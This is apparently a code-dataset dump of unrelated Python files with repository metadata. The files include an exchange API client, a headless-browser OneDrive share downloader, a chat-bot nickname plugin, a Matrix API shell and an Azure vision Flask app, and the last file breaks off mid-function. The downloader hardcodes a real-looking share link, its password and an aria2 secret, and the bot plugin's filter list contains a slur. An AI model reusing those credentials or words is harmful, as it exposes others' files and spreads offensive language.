] | 3 | 2015-01-25T19:48:31.000Z | 2021-01-08T20:49:50.000Z | """
WSGI config for postfixadmin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "postfixadmin.settings")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| 26.6 | 78 | 0.796992 |
552155a5f9d277c63da557d30cfee54197f2b773 | 12,557 | py | Python | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | anyex/xbtce.py | ttwishing/anyex | cfd1f2f04ab992b790add4843aafff91e5773cbf | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/anyex/anyex/blob/master/CONTRIBUTING.md#how-to-contribute-code
from anyex.base.exchange import Exchange
import hashlib
from anyex.base.errors import ExchangeError
from anyex.base.errors import NotSupported
from anyex.base.errors import AuthenticationError
class xbtce (Exchange):
def describe(self):
return self.deep_extend(super(xbtce, self).describe(), {
'id': 'xbtce',
'name': 'xBTCe',
'countries': 'RU',
'rateLimit': 2000, # responses are cached every 2 seconds
'version': 'v1',
'has': {
'publicAPI': False,
'CORS': False,
'fetchTickers': True,
'createMarketOrder': False,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28059414-e235970c-662c-11e7-8c3a-08e31f78684b.jpg',
'api': 'https://cryptottlivewebapi.xbtce.net:8443/api',
'www': 'https://www.xbtce.com',
'doc': [
'https://www.xbtce.com/tradeapi',
'https://support.xbtce.info/Knowledgebase/Article/View/52/25/xbtce-exchange-api',
],
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'currency',
'currency/{filter}',
'level2',
'level2/{filter}',
'quotehistory/{symbol}/{periodicity}/bars/ask',
'quotehistory/{symbol}/{periodicity}/bars/bid',
'quotehistory/{symbol}/level2',
'quotehistory/{symbol}/ticks',
'symbol',
'symbol/{filter}',
'tick',
'tick/{filter}',
'ticker',
'ticker/{filter}',
'tradesession',
],
},
'private': {
'get': [
'tradeserverinfo',
'tradesession',
'currency',
'currency/{filter}',
'level2',
'level2/{filter}',
'symbol',
'symbol/{filter}',
'tick',
'tick/{filter}',
'account',
'asset',
'asset/{id}',
'position',
'position/{id}',
'trade',
'trade/{id}',
'quotehistory/{symbol}/{periodicity}/bars/ask',
'quotehistory/{symbol}/{periodicity}/bars/ask/info',
'quotehistory/{symbol}/{periodicity}/bars/bid',
'quotehistory/{symbol}/{periodicity}/bars/bid/info',
'quotehistory/{symbol}/level2',
'quotehistory/{symbol}/level2/info',
'quotehistory/{symbol}/periodicities',
'quotehistory/{symbol}/ticks',
'quotehistory/{symbol}/ticks/info',
'quotehistory/cache/{symbol}/{periodicity}/bars/ask',
'quotehistory/cache/{symbol}/{periodicity}/bars/bid',
'quotehistory/cache/{symbol}/level2',
'quotehistory/cache/{symbol}/ticks',
'quotehistory/symbols',
'quotehistory/version',
],
'post': [
'trade',
'tradehistory',
],
'put': [
'trade',
],
'delete': [
'trade',
],
},
},
})
def fetch_markets(self):
markets = self.privateGetSymbol()
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['Symbol']
base = market['MarginCurrency']
quote = market['ProfitCurrency']
if base == 'DSH':
base = 'DASH'
symbol = base + '/' + quote
symbol = symbol if market['IsTradeAllowed'] else id
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
balances = self.privateGetAsset()
result = {'info': balances}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['Currency']
uppercase = currency.upper()
# xbtce names DASH incorrectly as DSH
if uppercase == 'DSH':
uppercase = 'DASH'
account = {
'free': balance['FreeAmount'],
'used': balance['LockedAmount'],
'total': balance['Amount'],
}
result[uppercase] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.privateGetLevel2Filter(self.extend({
'filter': market['id'],
}, params))
orderbook = orderbook[0]
timestamp = orderbook['Timestamp']
return self.parse_order_book(orderbook, timestamp, 'Bids', 'Asks', 'Price', 'Volume')
def parse_ticker(self, ticker, market=None):
timestamp = 0
last = None
if 'LastBuyTimestamp' in ticker:
if timestamp < ticker['LastBuyTimestamp']:
timestamp = ticker['LastBuyTimestamp']
last = ticker['LastBuyPrice']
if 'LastSellTimestamp' in ticker:
if timestamp < ticker['LastSellTimestamp']:
timestamp = ticker['LastSellTimestamp']
last = ticker['LastSellPrice']
if not timestamp:
timestamp = self.milliseconds()
symbol = None
if market:
symbol = market['symbol']
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': ticker['DailyBestBuyPrice'],
'low': ticker['DailyBestSellPrice'],
'bid': ticker['BestBid'],
'bidVolume': None,
'ask': ticker['BestAsk'],
'askVolume': None,
'vwap': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': ticker['DailyTradedTotalVolume'],
'quoteVolume': None,
'info': ticker,
}
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
tickers = self.publicGetTicker(params)
tickers = self.index_by(tickers, 'Symbol')
ids = list(tickers.keys())
result = {}
for i in range(0, len(ids)):
id = ids[i]
market = None
symbol = None
if id in self.markets_by_id:
market = self.markets_by_id[id]
symbol = market['symbol']
else:
base = id[0:3]
quote = id[3:6]
if base == 'DSH':
base = 'DASH'
if quote == 'DSH':
quote = 'DASH'
symbol = base + '/' + quote
ticker = tickers[id]
result[symbol] = self.parse_ticker(ticker, market)
return result
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
tickers = self.publicGetTickerFilter(self.extend({
'filter': market['id'],
}, params))
length = len(tickers)
if length < 1:
raise ExchangeError(self.id + ' fetchTicker returned empty response, xBTCe public API error')
tickers = self.index_by(tickers, 'Symbol')
ticker = tickers[market['id']]
return self.parse_ticker(ticker, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
# no method for trades?
return self.privateGetTrade(params)
def parse_ohlcv(self, ohlcv, market=None, timeframe='1m', since=None, limit=None):
return [
ohlcv['Timestamp'],
ohlcv['Open'],
ohlcv['High'],
ohlcv['Low'],
ohlcv['Close'],
ohlcv['Volume'],
]
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
# minutes = int(timeframe / 60) # 1 minute by default
# periodicity = str(minutes)
# self.load_markets()
# market = self.market(symbol)
# if not since:
# since = self.seconds() - 86400 * 7 # last day by defulat
# if not limit:
# limit = 1000 # default
# response = self.privateGetQuotehistorySymbolPeriodicityBarsBid(self.extend({
# 'symbol': market['id'],
# 'periodicity': periodicity,
# 'timestamp': since,
# 'count': limit,
# }, params))
# return self.parse_ohlcvs(response['Bars'], market, timeframe, since, limit)
raise NotSupported(self.id + ' fetchOHLCV is disabled by the exchange')
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
if type == 'market':
raise ExchangeError(self.id + ' allows limit orders only')
response = self.privatePostTrade(self.extend({
'pair': self.market_id(symbol),
'type': side,
'amount': amount,
'rate': price,
}, params))
return {
'info': response,
'id': str(response['Id']),
}
def cancel_order(self, id, symbol=None, params={}):
return self.privateDeleteTrade(self.extend({
'Type': 'Cancel',
'Id': id,
}, params))
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
if not self.apiKey:
raise AuthenticationError(self.id + ' requires apiKey for all requests, their public API is always busy')
if not self.uid:
raise AuthenticationError(self.id + ' requires uid property for authentication and trading, their public API is always busy')
url = self.urls['api'] + '/' + self.version
if api == 'public':
url += '/' + api
url += '/' + self.implode_params(path, params)
query = self.omit(params, self.extract_params(path))
if api == 'public':
if query:
url += '?' + self.urlencode(query)
else:
self.check_required_credentials()
headers = {'Accept-Encoding': 'gzip, deflate'}
nonce = str(self.nonce())
if method == 'POST':
if query:
headers['Content-Type'] = 'application/json'
body = self.json(query)
else:
url += '?' + self.urlencode(query)
auth = nonce + self.uid + self.apiKey + method + url
if body:
auth += body
signature = self.hmac(self.encode(auth), self.encode(self.secret), hashlib.sha256, 'base64')
credentials = self.uid + ':' + self.apiKey + ':' + nonce + ':' + self.binary_to_string(signature)
headers['Authorization'] = 'HMAC ' + credentials
return {'url': url, 'method': method, 'body': body, 'headers': headers}
| 38.636923 | 137 | 0.474317 |
dfc02ccdbc69fc9f6304f50138076a131d580512 | 2,333 | py | Python | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | 1 | 2021-09-03T03:47:41.000Z | 2021-09-03T03:47:41.000Z | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | null | null | null | havepassword.py | weixiangnan/OneDriveShareLinkPushAria2 | a415959a5e39e93b6ce8d417b7ad500368f8dc15 | [
"Apache-2.0"
] | null | null | null | import os
import asyncio
from main import getFiles, downloadFiles, header
from pprint import pprint
OneDriveShareURL = "https://jia666-my.sharepoint.com/:f:/g/personal/1025_xkx_me/EsqNMFlDoyZKt-RGcsI1F2EB6AiQMBIpQM4Ka247KkyOQw?e=oC1y7r"
OneDriveSharePwd = "xkx"
aria2Link = "http://localhost:5800/jsonrpc"
aria2Secret = "123456"
isDownload = False
downloadNum = "1,2-4,5" # 1,2,3,4,5
os.environ['PYPPETEER_HOME'] = os.path.split(os.path.realpath(__file__))[0]
# os.environ['PYPPETEER_DOWNLOAD_HOST'] = "http://npm.taobao.org/mirrors"
from pyppeteer import launch
pheader = {}
url = ""
async def main(iurl, password):
global pheader, url
browser = await launch()
page = await browser.newPage()
await page.goto(iurl, {'waitUntil': 'networkidle0'})
await page.focus("input[id='txtPassword']")
await page.keyboard.type(password)
verityElem = await page.querySelector("input[id='btnSubmitPassword']")
print("密码输入完成,正在跳转")
await asyncio.gather(
page.waitForNavigation(),
verityElem.click(),
)
url = await page.evaluate('window.location.href', force_expr=True)
await page.screenshot({'path': 'example.png'})
print("正在获取Cookie")
# print(p.headers, p.url)
_cookie = await page.cookies()
pheader = ""
for __cookie in _cookie:
coo = "{}={};".format(__cookie.get("name"), __cookie.get("value"))
pheader += coo
await browser.close()
def havePwdGetFiles(iurl, password):
global header
print("正在启动无头浏览器模拟输入密码")
asyncio.get_event_loop().run_until_complete(main(iurl, password))
print("无头浏览器关闭,正在获取文件列表")
print()
header['cookie'] = pheader
print(getFiles(url, None, 0))
def havePwdDownloadFiles(iurl, password, aria2URL, token, num=-1):
global header
print("正在启动无头浏览器模拟输入密码")
asyncio.get_event_loop().run_until_complete(main(iurl, password))
print("无头浏览器关闭,正在获取文件列表")
header['cookie'] = pheader
downloadFiles(url, None, 0, aria2URL, token, num=num)
if __name__ == "__main__":
if isDownload:
havePwdDownloadFiles(OneDriveShareURL, OneDriveSharePwd, aria2Link,
aria2Secret, num=downloadNum)
else:
havePwdGetFiles(OneDriveShareURL, OneDriveSharePwd)
| 30.298701 | 137 | 0.666952 |
99d2a3f3236264b7b98fe02443c3c249a71ae82d | 1,785 | py | Python | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 43 | 2017-10-29T11:05:47.000Z | 2018-09-25T19:05:13.000Z | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 38 | 2017-10-28T12:29:58.000Z | 2018-09-25T19:38:02.000Z | plugins/miscellaneous/misc_namer.py | almazboot/sketal | c36a415d2cf007cc85091a4637e8cda74ad88ca1 | [
"MIT"
] | 35 | 2017-10-30T05:35:28.000Z | 2018-10-01T10:45:41.000Z | from handler.base_plugin import CommandPlugin
from utils import Message
class NamerPlugin(CommandPlugin):
__slots__ = ("old_answer",)
def __init__(self, *commands, prefixes=None, strict=False):
"""Answers with information about bot. Requires: StoragePlugin."""
if not commands:
commands= ("зови меня",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
self.description = [f"\"Зови меня\"",
f"Указывает, как бот будет обращаться к вам.",
f"{self.command_example()} [имя] - установить себе псевдоним.",
f"{self.command_example()} никак - удалить свой псевдоним."]
_answer = Message.answer
async def new_answer(self, message="", **kwargs):
if self.meta["data_user"] and "nickname" in self.meta["data_user"]:
message = self.meta["data_user"]["nickname"] + ",\n" + message
return await _answer(self, message, **kwargs)
Message.answer = new_answer
async def process_message(self, msg):
if not msg.meta["data_user"]:
return await msg.answer("👊 Нет нужного плагина для этого \_:c_/")
_, name = self.parse_message(msg, full=True)
fname = name.strip().lower()
if len(fname) > 64:
return await msg.answer("👊 Слишком длинное имя!")
if any(mat in fname for mat in ("член", "гей", "хуй", "пидор")):
return await msg.answer("👊 Нет.")
if not fname or fname == "никак":
if "nickname" in msg.meta["data_user"]:
del msg.meta["data_user"]["nickname"]
else:
msg.meta["data_user"]["nickname"] = name
return await msg.answer("💭 Хорошо")
| 36.428571 | 91 | 0.579272 |
53139cfad7edcacf26ce373fb36d0003c0a48156 | 1,594 | py | Python | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | elasticmodelspy/types.py | g20ready/ElasticModelsPy | 4222cd8586384650a66e39fb830d5bcd5f8d5831 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from elasticmodelspy.analysis.base import Serializable
class ElasticBaseType(Serializable):
def __init__(self, name):
super(ElasticBaseType, self).__init__(name)
def __analysis_data__(self):
return dict()
class Text(ElasticBaseType):
field_data = False
index = True
analyzer = None
def __init__(self, field_data, index, analyzer):
super(Text, self).__init__()
self.field_data = field_data
self.index = self.__validate_index(index)
self.analyzer = self.__validate_analyzer(analyzer)
def __validate_index(self, index):
# TODO validate index
return index
def __validate_analyzer(self, analyzer):
if not (isinstance(self.analyzer, BaseAnalyzer) or isinstance(self.analyzer, str)):
raise TypeError('Analyzer ({0}) can only be of type elasticmodelspy.analyzers.BaseAnalyzer or str.'.format(analyzer))
return analyzer
def __repr__(self):
return "[ field_data : {0}, index : {1}, analyzer : {2} ]".format(self.field_data, self.index, self.analyzer)
class Keyword(ElasticBaseType):
pass
class Numeric(ElasticBaseType):
pass
class Date(ElasticBaseType):
pass
class Boolean(ElasticBaseType):
pass
class Binary(ElasticBaseType):
pass
class Range(ElasticBaseType):
pass
class Array(ElasticBaseType):
pass
class Nested(ElasticBaseType):
pass
class GeoPoint(ElasticBaseType):
pass
class GeoShape(ElasticBaseType):
pass
class Completion(ElasticBaseType):
pass
| 21.835616 | 129 | 0.69197 |
32bbca8ff7efe071ff8fdcab2e4a0df6a8a02cf3 | 4,427 | py | Python | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | code/get_priors.py | ajoer/Cultural-Recommendation | cfb2c8d8c63c4b7604fea173644c5fac16c92044 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
"""
Get prior probabilities for event type and language links.
Query Wikidata using SPARQL.
1) Prior probability of event type P(Et): # events of type T / total # of events
2) Prior probability of lanugage link P(Ll): # ll to language L / total # of language links to all language
Also need:
1 the distance from the event to the center of query LV, e.g. capitol.
4 event related entities popularity in query language (e.g. length of entity page in query language) or number of mentions of entity on query language Wiki.)
"""
import json
import pandas as pd
import requests
import time
import utils
from collections import defaultdict, Counter
languages = sorted(open("resources/wikipedia_LVs.txt").readlines())
# LV_stats = sorted(open("resources/wikipedia_LV_stats.tsv").readlines()[1:])
# LV_sizes = {}
# for line in LV_stats:
# line = line.split("\t")
# language = line[1].strip()
# size = int(line[2].strip().replace(",",""))
# if size > 30000:
# LV_sizes[language] = size
all_languages = """
SELECT ?l
WHERE
{
?l wdt:P31/wdt:P279 wd:P424 .
"""
language_pairs_query = """
SELECT (COUNT(DISTINCT(?item)) AS ?cnt) ?l1
WHERE
{
?item wdt:P31/wdt:P279 wd:Q1190554 .
?article1 schema:about ?item .
?article1 schema:inLanguage "%s" .
?article2 schema:about ?item .
?article2 schema:inLanguage ?l1 .
FILTER("%s" != ?l1) .
}
GROUP BY ?l1 ORDER BY DESC(COUNT(DISTINCT(?item)))
#LIMIT 10
"""
# (Two types of event classes)
# %s = wd:Q1656682, wd:Q1190554
event_types_query = """
SELECT ?item ?itemLabel (COUNT(?x) AS ?cnt)
WHERE
{
?item wdt:P279 %s .
?x wdt:P31 ?item .
SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . }
}
GROUP BY ?item ?itemLabel ORDER BY DESC(COUNT(?x))
LIMIT 10
"""
event_distribution_query = """
SELECT ?eventType (COUNT(?event) AS ?cnt)
WHERE
{
?event wdt:P31 ?eventType .
?eventType wdt:P279* %s .
?sitelink schema:about ?event .
?sitelink schema:inLanguage "%s" .
SERVICE wikibase:label { bd:serviceParam wikibase:language "en" . }
}
GROUP BY ?eventType ORDER BY DESC(COUNT(?event))
"""
# def get_sum_lls(language_links):
# sum_lls_per_lang = Counter()
# for l in language_links:
# for l1 in language_links[l]:
# sum_lls_per_lang[l1] += language_links[l][l1]
# return sum_lls_per_lang
# def normalize_by_lls(language_links, sum_lls_per_lang):
# for l in language_links:
# for l1 in language_links[l]:
# if l1 not in sum_lls_per_lang: del language_links[l][l1]
# normalized = language_links[l][l1]/sum_lls_per_lang[l1]
# language_links[l][l1] = normalized
# return language_links
# def normalize_by_LVsize(pairs):
# to_delete = []
# for l1 in pairs:
# if l1 in LV_sizes:
# pairs[l1] = pairs[l1]/LV_sizes[l1]
# else:
# to_delete.append(l1)
# for l in to_delete:
# print(l)
# del pairs[l]
# return pairs
def normalize(counter):
total = sum(counter.values())
for key, value in counter.items():
counter[key] = (value/total) * 100
return counter
def get_language_pairs():
''' Get language links per query language for languages that have the same pages as query language.'''
for lang in languages:
language_links = {}
lang = lang.strip()
pairs = Counter()
print(10*" * ", lang)
result = utils.query_wikidata(language_pairs_query % (lang, lang))
if result.empty == True: continue
l1s = result["l1.value"]
values = result["cnt.value"]
for l1, v in zip(l1s, values):
pairs[l1] = int(v)
language_links[lang] = normalize(pairs)
utils.save2json(language_links, "resources/language_links_%s.json" % lang)
def get_event_distributions():
for lang in languages:
event_dist_per_language = {}
event_distribution = Counter()
lang = lang.strip()
print(10*" * ", lang)
# Just using one of the wds for "event":
result = utils.query_wikidata(event_distribution_query % ("wd:Q1656682", lang))
if result.empty == True: continue
event_types = result["eventType.value"]
values = result["cnt.value"]
for et, v in zip(event_types, values):
event_distribution[et.split("/")[-1]] = int(v)
if event_distribution:
normalized_distribution = normalize(event_distribution)
event_dist_per_language[lang] = normalized_distribution
utils.save2json(event_dist_per_language, "resources/event_distributions_%s.json" % lang)
event_dist_per_language = {}
if __name__ == "__main__":
get_language_pairs()
#get_event_distributions()
| 26.041176 | 162 | 0.702281 |
682394209be4ca9fc032aefc7829d6dc5ee3f6b0 | 2,551 | py | Python | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | 9 | 2019-12-04T12:50:43.000Z | 2021-02-28T13:45:30.000Z | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | null | null | null | viewer.py | BoyuanChen/visual_behavior_modeling | 8b6eb0516c562306c5d775632223ad0de775f170 | [
"MIT"
] | 2 | 2020-07-09T20:35:15.000Z | 2020-11-16T14:03:10.000Z |
"""
This code is for plotting real size output image. For high resolution images for demonstration and paper, please refer to
demonstration_viewer.py
"""
import os
import sys
import shutil
import numpy as np
from PIL import Image
from tqdm import tqdm
test_results_folder = './test_results'
test_results_img_folder = './test_results/images'
test_results_files = os.listdir(test_results_folder)
if os.path.exists(test_results_img_folder):
shutil.rmtree(test_results_img_folder)
os.makedirs(test_results_img_folder)
height = 64
width = 192
test_results_files = ['test_resutls_90.npy']
for p_file in tqdm(test_results_files):
p_file_path = os.path.join(test_results_folder, p_file)
p_epoch_res = np.load(p_file_path)
epoch_idx = p_file.split('.')[0].split('_')[2]
epoch_folder = 'epoch_' + epoch_idx
epoch_folder = os.path.join(test_results_img_folder, epoch_folder)
os.makedirs(epoch_folder)
index = 0
num_batch = p_epoch_res.shape[0]
for p_batch in tqdm(range(num_batch)):
data = p_epoch_res[p_batch][0]
tar = p_epoch_res[p_batch][1]
res = p_epoch_res[p_batch][2]
batch_size = tar.shape[0]
for p_data in range(batch_size):
# get output image
out_img = res[p_data]
out_img = np.transpose(out_img, (1, 2, 0))
# out_img = out_img * 128 + 128
out_img = out_img * 255
# import IPython
# IPython.embed()
# assert False
out_img = Image.fromarray(out_img.astype('uint8'))
# get target image
tar_out_img = tar[p_data]
tar_out_img = np.transpose(tar_out_img, (1, 2, 0))
# tar_out_img = tar_out_img * 128 + 128
tar_out_img = tar_out_img * 255
tar_out_img = Image.fromarray(tar_out_img.astype('uint8'))
# get data image
data_out_img = data[p_data]
data_out_img = np.transpose(data_out_img, (1, 2, 0))
# data_out_img = data_out_img * 128 + 128
data_out_img = data_out_img * 255
data_out_img = Image.fromarray(data_out_img.astype('uint8'))
# save them side by side
new = Image.new('RGB', (width, height))
new.paste(data_out_img, (0, 0))
new.paste(tar_out_img, (64, 0))
new.paste(out_img, (128, 0))
filename = 'img_' + str(index) + '.png'
filepath = os.path.join(epoch_folder, filename)
new.save(filepath)
index += 1 | 34.013333 | 121 | 0.626421 |
83974620d21bef9f5bce02694199d5803d802da1 | 2,146 | py | Python | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | 1 | 2022-03-03T20:51:27.000Z | 2022-03-03T20:51:27.000Z | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | null | null | null | app.py | AzureAdvocateBit/Hackathon-CaptureImageForComputerVision-1 | 7583dbc8fcb1afd2d4c7c498ca88e5fd63e08f7d | [
"MIT"
] | 3 | 2020-05-25T05:57:07.000Z | 2020-11-14T10:02:15.000Z | import os, io, base64
from flask import Flask, render_template, request, jsonify
from azure.cognitiveservices.vision.computervision import ComputerVisionClient
from azure.cognitiveservices.vision.computervision.models import TextOperationStatusCodes
from azure.cognitiveservices.vision.computervision.models import TextRecognitionMode
from azure.cognitiveservices.vision.computervision.models import VisualFeatureTypes
from msrest.authentication import CognitiveServicesCredentials
credentials = CognitiveServicesCredentials(os.environ['computer_vision_key'])
computervision_client = ComputerVisionClient(os.environ['computer_vision_endpoint'], credentials)
app = Flask(__name__)
# The root route, returns the home.html page
@app.route('/')
def home():
# Add any required page data here
page_data = {}
return render_template('home.html', page_data = page_data)
@app.route('/process_image', methods=['POST'])
def check_results():
# Get the JSON passed to the request and extract the image
# Convert the image to a binary stream ready to pass to Azure AI services
body = request.get_json()
image_bytes = base64.b64decode(body['image_base64'].split(',')[1])
image = io.BytesIO(image_bytes)
# Send the image to the Computer Vision service
description_results = computervision_client.describe_image_in_stream(image)
# Get the captions (descriptions) from the response, with confidence level
description = 'Description of remote image: '
if (len(description_results.captions) == 0):
description = description + 'No description detected.'
else:
for caption in description_results.captions:
description = description + '\n"{}" with confidence {:.2f}%'.format(caption.text, caption.confidence * 100)
######################################################
# #
# Add your code here to use the Computer Vision SDK #
# #
#####################################################
# Return a result
return jsonify({'description' : description})
| 44.708333 | 119 | 0.679404 |
1395376f9b395e4b39c034a6d9d886d02e7ff356 | 1,364 | py | Python | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 2,792 | 2017-06-26T13:05:44.000Z | 2022-03-28T07:55:26.000Z | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 138 | 2017-06-27T07:04:44.000Z | 2022-02-28T01:37:15.000Z | python/benchmark/function/test_activation.py | daniel-falk/nnabla | 3fe132ea52dc10521cc029a5d6ba8f565cf65ccf | [
"Apache-2.0"
] | 380 | 2017-06-26T13:23:52.000Z | 2022-03-25T16:51:30.000Z | # Copyright 2017,2018,2019,2020,2021 Sony Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import nnabla.functions as F
from function_benchmark import FunctionBenchmark, Inspec
def inspecs_params():
inspecs = []
inspecs.append([Inspec((64, 64, 224, 224))])
inspecs.append([Inspec((64, 128, 112, 112))])
inspecs.append([Inspec((64, 512, 14, 14))])
return inspecs
@pytest.mark.parametrize('inspecs', inspecs_params())
@pytest.mark.parametrize('activation',
['identity', 'sigmoid', 'tanh', 'relu', 'elu', 'crelu'])
def test_activation(inspecs, activation, nnabla_opts):
func = getattr(F, activation)
fb = FunctionBenchmark(
func, inspecs, [], {},
nnabla_opts.ext, nnabla_opts.ext_kwargs)
fb.benchmark()
fb.write(writer=nnabla_opts.function_benchmark_writer)
| 33.268293 | 81 | 0.709677 |
47aacbe7332e3b8f2de658635efa7783a771f68e | 1,495 | py | Python | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 2,101 | 2016-06-01T11:31:49.000Z | 2022-03-27T20:13:19.000Z | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 5,291 | 2016-06-01T18:14:04.000Z | 2022-03-31T11:19:09.000Z | tools/debugging/matrix/api_shell.py | tirkarthi/raiden | dbd03ddda039332b54ec0c02d81cbe1100bc8028 | [
"MIT"
] | 484 | 2016-06-01T18:21:06.000Z | 2022-03-22T10:29:45.000Z | #!/usr/bin/env python
import os
import click
import IPython
from eth_utils import encode_hex, to_normalized_address
from raiden.accounts import AccountManager
from raiden.network.transport.matrix.client import GMatrixHttpApi
from raiden.utils.cli import ADDRESS_TYPE
from raiden.utils.formatting import to_checksum_address
from raiden.utils.signer import LocalSigner
from raiden.utils.typing import Address
@click.command()
@click.option(
"--address",
help="The ethereum address for which to get a login",
type=ADDRESS_TYPE,
required=True,
)
@click.password_option(
"--password", confirmation_prompt=False, help="Password to unlock the keystore file."
)
@click.option(
"--server", help="Matrix server to connect to", default="https://transport01.raiden.network"
)
def matrix_api_shell(address: Address, password: str, server: str) -> None:
am = AccountManager(os.path.expanduser("~/.ethereum/keystore"))
signer = LocalSigner(am.get_privkey(to_checksum_address(address), password))
server_name = server.split("//")[1]
matrix_password = encode_hex(signer.sign(server_name.encode()))
api = GMatrixHttpApi(server)
resp = api.login(
"m.login.password", user=to_normalized_address(address), password=matrix_password
)
api.token = resp["access_token"]
IPython.embed(header=f"Use the `api` object to interact with matrix on {server}.")
if __name__ == "__main__":
matrix_api_shell() # pylint: disable=no-value-for-parameter
| 33.222222 | 96 | 0.747157 |
a9ff5eee96d3ddf89b5b67ffcdbf9370093ab44a | 7,851 | py | Python | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | 1 | 2021-11-18T23:52:14.000Z | 2021-11-18T23:52:14.000Z | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | null | null | null | models/baseline/baseline_train.py | Sharp-rookie/seedcup | 27a001c43459ec9bb69ab7596e0efbab93ed7708 | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from colorama import Fore
from baseline_model import Fake1DAttention
from metric import *
import pandas as pd
import os
import argparse
from hyp_evol import *
rate = "0.5" # 默认为6:4的正负样本比例,若要改为1:1则取rate=“0.5”
record = pd.DataFrame(columns=['Epoch', 'P1', 'P0', 'Fscore'])
class SeedDataset(Dataset):
def __init__(self, annotations_file):
super().__init__()
self.data: pd.DataFrame = pd.read_csv(annotations_file)
self.data: pd.DataFrame = self.data[self.data['label'].notna()]
self.Y = self.data['label']
self.X = self.data.drop(columns=['id', 'label']).fillna(value=-1)
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
return torch.as_tensor(self.X.iloc[idx].values).type(torch.FloatTensor), torch.as_tensor(self.Y.iloc[idx]).type(
torch.LongTensor)
def train(dataloader, model, loss_fn, optimizer, device, positive_weight):
model.train()
Y = []
for batch, (X, y) in enumerate(dataloader):
X, y = X.to(device), y.to(device)
logit = model(X)
positive_index = y == 1
loss = loss_fn(logit, y)
